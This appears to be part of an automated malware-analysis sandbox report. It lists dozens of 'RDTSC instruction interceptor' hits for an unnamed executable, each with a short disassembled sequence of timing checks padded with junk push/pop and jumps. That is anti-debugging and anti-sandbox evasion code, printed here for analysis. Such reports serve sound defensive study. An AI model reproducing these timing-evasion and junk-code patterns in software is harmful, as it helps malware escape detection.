                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB033 second address: 8FB03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8480743926h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FBF5F second address: 8FBF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503871h 0x00000009 popad 0x0000000a jmp 00007F848150386Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FBF8B second address: 8FBF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FCF58 second address: 8FCF84 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F848150386Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jne 00007F8481503877h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906153 second address: 90615D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90615D second address: 906167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906167 second address: 90616B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90616B second address: 906180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F848150386Dh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906180 second address: 906184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D401 second address: 89D409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90587C second address: 905880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905880 second address: 905886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905886 second address: 905896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007F8480743926h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905896 second address: 90589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905BBB second address: 905BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905BBF second address: 905BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 jmp 00007F848150386Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F848150386Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905BF0 second address: 905BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905BF6 second address: 905C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8481503879h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905C18 second address: 905C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905C22 second address: 905C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 905D40 second address: 905D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8480743926h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B449 second address: 90B45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8481503866h 0x0000000a pop esi 0x0000000b jl 00007F848150386Ah 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B45E second address: 90B484 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F848074392Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F8480743928h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007F848074392Eh 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D702 second address: 90D714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F8481503866h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D714 second address: 90D71A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D71A second address: 90D720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914012 second address: 914025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912C71 second address: 912C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912C7A second address: 912C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912C80 second address: 912C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913324 second address: 91332A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91332A second address: 913345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F8481503873h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913345 second address: 913369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F8480743943h 0x0000000b jmp 00007F8480743937h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913369 second address: 913373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913373 second address: 913379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913379 second address: 91337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91337E second address: 913389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8480743926h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9134D0 second address: 9134E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F8481503866h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9134E1 second address: 9134F2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91368A second address: 91368E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91368E second address: 913692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9137E4 second address: 913805 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F8481503866h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 je 00007F8481503866h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913ABB second address: 913AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F8480743930h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913AD2 second address: 913ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913C30 second address: 913C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EE71 second address: 89EE76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EE76 second address: 89EE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D8E2 second address: 91D8F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C5FB second address: 91C601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C8CD second address: 91C8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503872h 0x00000011 jl 00007F8481503866h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CA31 second address: 91CA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743935h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CA4C second address: 91CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CCC9 second address: 91CCCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CCCD second address: 91CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D11D second address: 91D130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F8480743926h 0x0000000d jno 00007F8480743926h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9783 second address: 8C9787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D773 second address: 91D777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D777 second address: 91D792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F848150386Eh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D792 second address: 91D7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924375 second address: 92437F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8481503866h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92437F second address: 924389 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924389 second address: 924394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894CAB second address: 894CC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F848074392Ch 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92332B second address: 923341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92360B second address: 923626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480743937h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923761 second address: 923765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923A35 second address: 923A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923A3B second address: 923A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503875h 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923A5A second address: 923A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8480743938h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8480743931h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923A8E second address: 923AA3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8481503868h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jbe 00007F8481503866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923AA3 second address: 923AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923C10 second address: 923C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923C14 second address: 923C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743937h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923DBB second address: 923DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F848150386Fh 0x00000008 jl 00007F8481503866h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923DD7 second address: 923DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923DDF second address: 923DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923DE5 second address: 923DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9278BE second address: 9278C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9278C2 second address: 9278C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9278C6 second address: 9278D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9278D0 second address: 9278D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9278D4 second address: 9278F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jo 00007F848150387Ah 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007F8481503866h 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92AF3E second address: 92AF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92AF47 second address: 92AF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92AF4D second address: 92AF62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jno 00007F8480743926h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92AF62 second address: 92AF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92AF66 second address: 92AF6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92AF6C second address: 92AF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E276B second address: 8E279E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8480743934h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2C1E second address: 8E2C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2C24 second address: 8E2C9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ebx 0x00000015 jmp 00007F8480743935h 0x0000001a pop ebx 0x0000001b pop eax 0x0000001c mov cx, si 0x0000001f pushad 0x00000020 jmp 00007F848074392Eh 0x00000025 mov si, cx 0x00000028 popad 0x00000029 call 00007F8480743929h 0x0000002e jmp 00007F8480743938h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F8480743934h 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2C9E second address: 8E2CA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2CA3 second address: 8E2CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnp 00007F8480743933h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F8480743935h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2D75 second address: 8E2D8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E30A8 second address: 8E30B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jnp 00007F8480743934h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E30B9 second address: 8E3102 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F848150386Ah 0x00000010 push 00000004h 0x00000012 jmp 00007F8481503876h 0x00000017 push eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8481503878h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3102 second address: 8E3106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3575 second address: 8E357A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E389B second address: 8E389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3A06 second address: 8E3A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
